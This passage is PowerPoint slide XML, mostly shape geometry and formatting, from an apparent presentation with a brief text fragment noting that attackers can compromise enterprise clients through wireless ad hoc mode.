                  <a:pt x="31" y="166"/>
                  <a:pt x="104" y="104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="166" y="31"/>
                  <a:pt x="239" y="0"/>
                  <a:pt x="333" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="416" y="0"/>
                  <a:pt x="500" y="31"/>
                  <a:pt x="562" y="104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="625" y="166"/>
                  <a:pt x="656" y="239"/>
                  <a:pt x="656" y="333"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="583" y="333"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="583" y="260"/>
                  <a:pt x="562" y="198"/>
                  <a:pt x="510" y="156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="458" y="104"/>
                  <a:pt x="396" y="83"/>
                  <a:pt x="333" y="83"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="260" y="83"/>
                  <a:pt x="198" y="104"/>
                  <a:pt x="156" y="156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="198"/>
                  <a:pt x="73" y="260"/>
                  <a:pt x="73" y="333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="396"/>
                  <a:pt x="93" y="448"/>
                  <a:pt x="146" y="499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="146" y="499"/>
                  <a:pt x="146" y="510"/>
                  <a:pt x="156" y="510"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="156" y="520"/>
                  <a:pt x="166" y="531"/>
                  <a:pt x="166" y="541"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="562"/>
                  <a:pt x="187" y="583"/>
                  <a:pt x="198" y="604"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="208" y="624"/>
                  <a:pt x="218" y="645"/>
                  <a:pt x="229" y="666"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="229" y="697"/>
                  <a:pt x="239" y="708"/>
                  <a:pt x="239" y="718"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="427" y="718"/>
                  <a:pt x="427" y="718"/>
                  <a:pt x="427" y="718"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="427" y="708"/>
                  <a:pt x="427" y="697"/>
                  <a:pt x="437" y="666"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="437" y="645"/>
                  <a:pt x="448" y="624"/>
                  <a:pt x="458" y="604"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="468" y="583"/>
                  <a:pt x="479" y="562"/>
                  <a:pt x="489" y="541"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="489" y="531"/>
                  <a:pt x="500" y="520"/>
                  <a:pt x="510" y="520"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="510" y="510"/>
                  <a:pt x="510" y="499"/>
                  <a:pt x="521" y="499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="562" y="448"/>
                  <a:pt x="583" y="396"/>
                  <a:pt x="583" y="333"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="385" y="416"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="354" y="354"/>
                  <a:pt x="354" y="354"/>
                  <a:pt x="354" y="354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="333" y="302"/>
                  <a:pt x="333" y="302"/>
                  <a:pt x="333" y="302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="302" y="354"/>
                  <a:pt x="302" y="354"/>
                  <a:pt x="302" y="354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="271" y="416"/>
                  <a:pt x="271" y="416"/>
                  <a:pt x="271" y="416"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="354"/>
                  <a:pt x="239" y="354"/>
                  <a:pt x="239" y="354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="187" y="385"/>
                  <a:pt x="187" y="385"/>
                  <a:pt x="187" y="385"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="250" y="499"/>
                  <a:pt x="250" y="499"/>
                  <a:pt x="250" y="499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="271" y="552"/>
                  <a:pt x="271" y="552"/>
                  <a:pt x="271" y="552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="302" y="499"/>
                  <a:pt x="302" y="499"/>
                  <a:pt x="302" y="499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="333" y="437"/>
                  <a:pt x="333" y="437"/>
                  <a:pt x="333" y="437"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="364" y="499"/>
                  <a:pt x="364" y="499"/>
                  <a:pt x="364" y="499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="385" y="552"/>
                  <a:pt x="385" y="552"/>
                  <a:pt x="385" y="552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="416" y="499"/>
                  <a:pt x="416" y="499"/>
                  <a:pt x="416" y="499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="479" y="385"/>
                  <a:pt x="479" y="385"/>
                  <a:pt x="479" y="385"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="427" y="354"/>
                  <a:pt x="427" y="354"/>
                  <a:pt x="427" y="354"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="385" y="416"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="385" y="416"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="385" y="41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lIns="121893" tIns="60946" rIns="121893" bIns="60946" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ED7D31"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="SimSun" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5189923" y="5501227"/>
            <a:ext cx="2748123" cy="1032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21893" tIns="60946" rIns="121893" bIns="60946"/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Thus, attackers can easily connect to and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compromise the enterprise client operating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 ad hoc mode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="AutoShape 39"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1363811" y="3124200"/>
            <a:ext cx="300999" cy="301077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 10797 w 21595"/>
              <a:gd name="T1" fmla="*/ 10800 h 21600"/>
              <a:gd name="T2" fmla="*/ 10797 w 21595"/>
              <a:gd name="T3" fmla="*/ 10800 h 21600"/>
              <a:gd name="T4" fmla="*/ 10797 w 21595"/>
              <a:gd name="T5" fmla="*/ 10800 h 21600"/>
              <a:gd name="T6" fmla="*/ 10797 w 21595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595" h="21600">
                <a:moveTo>
                  <a:pt x="8043" y="21599"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7769" y="21599"/>
                  <a:pt x="7477" y="21507"/>
                  <a:pt x="7164" y="21320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6850" y="21132"/>
                  <a:pt x="6608" y="20916"/>
                  <a:pt x="6436" y="20665"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="266" y="11697"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="11439"/>
                  <a:pt x="0" y="11120"/>
                  <a:pt x="0" y="10741"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="10362"/>
                  <a:pt x="88" y="10047"/>
                  <a:pt x="266" y="9799"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2307" y="6831"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2488" y="6573"/>
                  <a:pt x="2708" y="6445"/>
                  <a:pt x="2970" y="6452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3233" y="6459"/>
                  <a:pt x="3448" y="6583"/>
                  <a:pt x="3622" y="6831"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7903" y="13022"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8082" y="13280"/>
                  <a:pt x="8302" y="13408"/>
                  <a:pt x="8567" y="13408"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8827" y="13408"/>
                  <a:pt x="9045" y="13280"/>
                  <a:pt x="9221" y="13022"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17965" y="393"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18144" y="127"/>
                  <a:pt x="18364" y="0"/>
                  <a:pt x="18629" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18888" y="0"/>
                  <a:pt x="19109" y="127"/>
                  <a:pt x="19292" y="393"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21333" y="3339"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21511" y="3601"/>
                  <a:pt x="21600" y="3920"/>
                  <a:pt x="21595" y="4299"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21590" y="4678"/>
                  <a:pt x="21502" y="4993"/>
                  <a:pt x="21333" y="5241"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10664" y="20665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10482" y="20930"/>
                  <a:pt x="10237" y="21146"/>
                  <a:pt x="9929" y="21330"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9620" y="21511"/>
                  <a:pt x="9339" y="21599"/>
                  <a:pt x="9079" y="21599"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8043" y="215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lIns="50789" tIns="50789" rIns="50789" bIns="50789" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457098">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="44CEB9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cs typeface="Gill Sans" charset="0"/>
              <a:sym typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1676" name="Group 1675">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ED7C674-C273-4337-A3D2-4050295DE0B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3426839" y="1150053"/>
            <a:ext cx="8680264" cy="5102951"/>
            <a:chOff x="2174558" y="1211016"/>
            <a:chExt cx="8680264" cy="5102951"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1677" name="Group 1676">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03568669-4B27-463A-BF98-314BCC54EF00}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5609695" y="1695263"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2487" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BABC738A-570B-4E60-B050-3187114425BA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5546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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88" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E9AFDF1-F23D-474B-8052-7E39EB354F63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74661" y="949014"/>
                <a:ext cx="2104624" cy="210149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89" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00E75D0D-CE07-4863-B1A9-303AEDB24CB6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342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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90" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62E92C53-E0E8-4290-BCF0-D520D285FF70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509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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91" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{081EAEC0-3841-45FF-AC0B-867EDBA0FCCD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676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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92" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D01D3BC7-F418-4C7A-A3BB-F006A017264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860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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93" name="Oval 2492">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB219285-4CDF-4642-B172-1C6B8205C1B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1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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678" name="Group 1677">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B8EBB75-7EA0-4098-B886-24ABF27840D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8207863" y="3761285"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2480" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8037947-65B2-42D0-8BEC-20FD9A3591F5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5546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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81" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91FB132E-0892-433B-9A85-D60D21567F2E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74661" y="949014"/>
                <a:ext cx="2104624" cy="210149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82" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D238499A-AEF6-4F67-A41A-3B7153E53BB4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342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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83" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3F70824-0CBA-49F4-A4BE-7664CB412702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509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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84" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD8084A4-91EE-40FD-8B13-FECB1001967D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676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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85" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D222B4B-DF7B-4879-AC20-0A1ACACB6B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860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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86" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D26BFDD3-C987-4700-B652-5CD44382D3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1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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679" name="Group 872">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1726F20E-C676-480D-BFC2-E79FB186C74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173021" y="3337247"/>
              <a:ext cx="591617" cy="176891"/>
              <a:chOff x="1728" y="-938"/>
              <a:chExt cx="3134" cy="936"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2476" name="Freeform 873">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A97D918E-32C9-46CD-A151-0A7331F5962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28" y="-699"/>
                <a:ext cx="196" cy="630"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 196"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 0 w 196"/>
                  <a:gd name="T3" fmla="*/ 97 h 630"/>
                  <a:gd name="T4" fmla="*/ 196 w 196"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 196 w 196"/>
                  <a:gd name="T7" fmla="*/ 534 h 630"/>
                  <a:gd name="T8" fmla="*/ 0 w 196"/>
                  <a:gd name="T9" fmla="*/ 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630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5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77" name="Freeform 874">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2003C780-FD41-4C6F-90E4-F156BDEDE54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924" y="-165"/>
                <a:ext cx="2043" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T3" fmla="*/ 68 h 163"/>
                  <a:gd name="T4" fmla="*/ 0 w 2043"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 0 w 2043"/>
                  <a:gd name="T7" fmla="*/ 96 h 163"/>
                  <a:gd name="T8" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T9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43" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="163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78" name="Freeform 875">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10F2B75-9DED-4563-9E3C-07774642891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518" y="-579"/>
                <a:ext cx="1344" cy="456"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 456"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 95 h 456"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 456 h 456"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 362 h 456"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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6">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344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79" name="Freeform 876">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAEC3FC2-A422-4693-87AF-BC5E7430E13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28" y="-938"/>
                <a:ext cx="3134" cy="841"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 3134"/>
                  <a:gd name="T1" fmla="*/ 773 h 841"/>
                  <a:gd name="T2" fmla="*/ 0 w 3134"/>
                  <a:gd name="T3" fmla="*/ 239 h 841"/>
                  <a:gd name="T4" fmla="*/ 446 w 3134"/>
                  <a:gd name="T5" fmla="*/ 359 h 841"/>
                  <a:gd name="T6" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T7" fmla="*/ 0 h 841"/>
                  <a:gd name="T8" fmla="*/ 3134 w 3134"/>
                  <a:gd name="T9" fmla="*/ 359 h 841"/>
                  <a:gd name="T10" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T11" fmla="*/ 721 h 841"/>
                  <a:gd name="T12" fmla="*/ 2239 w 3134"/>
                  <a:gd name="T13" fmla="*/ 841 h 841"/>
                  <a:gd name="T14" fmla="*/ 196 w 3134"/>
                  <a:gd name="T15" fmla="*/ 773 h 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4" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="773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680" name="Group 2303">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354BAF0F-C508-4D5C-863C-F8CB3B30AD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82066" y="1884528"/>
              <a:ext cx="577022" cy="590170"/>
              <a:chOff x="2494" y="1923"/>
              <a:chExt cx="1109" cy="1134"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2464" name="Freeform 2304">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9893C94-964D-4AA0-ACCC-F87F5E3E751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71" y="1937"/>
                <a:ext cx="73" cy="855"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 165 w 165"/>
                  <a:gd name="T1" fmla="*/ 0 h 1918"/>
                  <a:gd name="T2" fmla="*/ 165 w 165"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1918"/>
                  <a:gd name="T4" fmla="*/ 0 w 165"/>
                  <a:gd name="T5" fmla="*/ 1918 h 1918"/>
                  <a:gd name="T6" fmla="*/ 0 w 165"/>
                  <a:gd name="T7" fmla="*/ 42 h 1918"/>
                  <a:gd name="T8" fmla="*/ 165 w 165"/>
                  <a:gd name="T9" fmla="*/ 0 h 19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5" h="1918">
                    <a:moveTo>
                      <a:pt x="165" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="165" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42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80808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65" name="Freeform 2305">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9FDC0-490F-4EA0-B986-8B798DF562F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52" y="2208"/>
                <a:ext cx="51" cy="849"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 114"/>
                  <a:gd name="T1" fmla="*/ 0 h 1904"/>
                  <a:gd name="T2" fmla="*/ 0 w 114"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1904"/>
                  <a:gd name="T4" fmla="*/ 114 w 114"/>
                  <a:gd name="T5" fmla="*/ 1904 h 1904"/>
                  <a:gd name="T6" fmla="*/ 114 w 114"/>
                  <a:gd name="T7" fmla="*/ 31 h 1904"/>
                  <a:gd name="T8" fmla="*/ 0 w 114"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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" h="1904">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="1904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114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696"/>
              </a:solidFill>
              <a:ln w="14351" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="969696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66" name="Freeform 2306">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56636E72-3C5D-448D-8EEB-F0547F0CF7D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20" y="1943"/>
                <a:ext cx="51" cy="849"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 113"/>
                  <a:gd name="T1" fmla="*/ 0 h 1904"/>
                  <a:gd name="T2" fmla="*/ 0 w 113"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1904"/>
                  <a:gd name="T4" fmla="*/ 113 w 113"/>
                  <a:gd name="T5" fmla="*/ 1904 h 1904"/>
                  <a:gd name="T6" fmla="*/ 113 w 113"/>
                  <a:gd name="T7" fmla="*/ 28 h 1904"/>
                  <a:gd name="T8" fmla="*/ 0 w 113"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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3" h="1904">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="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80808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467" name="Group 2307">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C338D8B-80A3-4A00-9C88-0DEA748018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4" y="2030"/>
                <a:ext cx="908" cy="377"/>
                <a:chOff x="806" y="1728"/>
                <a:chExt cx="2036" cy="845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
